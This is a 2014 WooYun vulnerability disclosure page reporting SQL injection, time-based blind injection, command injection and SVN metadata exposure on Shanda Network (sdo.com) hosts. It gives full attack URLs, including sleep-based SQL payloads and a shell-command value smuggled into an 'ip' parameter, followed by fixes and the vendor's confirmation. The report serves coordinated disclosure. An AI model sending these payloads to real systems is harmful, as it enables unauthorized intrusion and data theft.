漏洞概要
关注数(24)
关注此漏洞
漏洞标题:盛大网络高危安全漏洞礼包(SQL注入,命令执行等)
提交时间:2014-06-25 15:13
修复时间:2014-08-09 15:14
公开时间:2014-08-09 15:14
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-06-25: 细节已通知厂商并且等待厂商处理中
2014-06-25: 厂商已经确认,细节仅向厂商公开
2014-07-05: 细节向核心白帽子及相关领域专家公开
2014-07-15: 细节向普通白帽子公开
2014-07-25: 细节向实习白帽子公开
2014-08-09: 细节向公众公开
简要描述:
盛大网络高危安全漏洞礼包(SQL注入,命令执行等)
详细说明:
漏洞证明:
SQL注入
http://pl.sdo.com/xc/20121030/index.asp?termid=1
盲注
http://sm.sdo.com, 参数:account
sleep 5秒
http://sm.sdo.com/msite/Equipment.ashx?account=(select(0)from(select(sleep(5)))v)/*%27%2b(select(0)from(select(sleep(5)))v)%2b%27%22%2b(select(0)from(select(sleep(5)))v)%2b%22*/&flag=1&page=1&pagesize=12&phone=null&rdn=0.012025125557556748
sleep 15秒
http://sm.sdo.com/msite/Equipment.ashx?account=(select(0)from(select(sleep(15)))v)/*%27%2b(select(0)from(select(sleep(15)))v)%2b%27%22%2b(select(0)from(select(sleep(15)))v)%2b%22*/&flag=1&page=1&pagesize=12&phone=null&rdn=0.012025125557556748
代码执行
参数 :ip
http://upfiles.igw2.sdo.com/search/search.php?appid=1&date=01/01/1967&ip='set%7cset%26set'&login=%e6%90%9c%e7%b4%a2&type=1&version=1
SVN 信息泄漏
http://bbs.rd.sdo.com/include/.svn/entries
自己看吧。
修复方案:
修复方法:
1、参数化SQL语句
2、过滤危险字符
3、删除.svn目录
版权声明:转载请注明来源 Eoh@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-06-25 15:17
厂商回复:
谢谢报告,正在紧急修复!
最新状态:
暂无
漏洞评价:
评论
-
2014-06-25 15:17 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2014-06-25 15:18 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2014-06-25 15:25 |
eval ( 普通白帽子 | Rank:131 漏洞数:23 | 专注小厂商五十年。)
@疯狗 管理员那2个漏洞什么时候审核哇(⊙0⊙) 已经私信你了
-
2014-06-25 15:26 |
盛大网络(乌云厂商)
-
2014-06-25 15:29 |
盛大网络(乌云厂商)
-
2014-06-25 20:37 |
李白 ( 普通白帽子 | Rank:142 漏洞数:29 )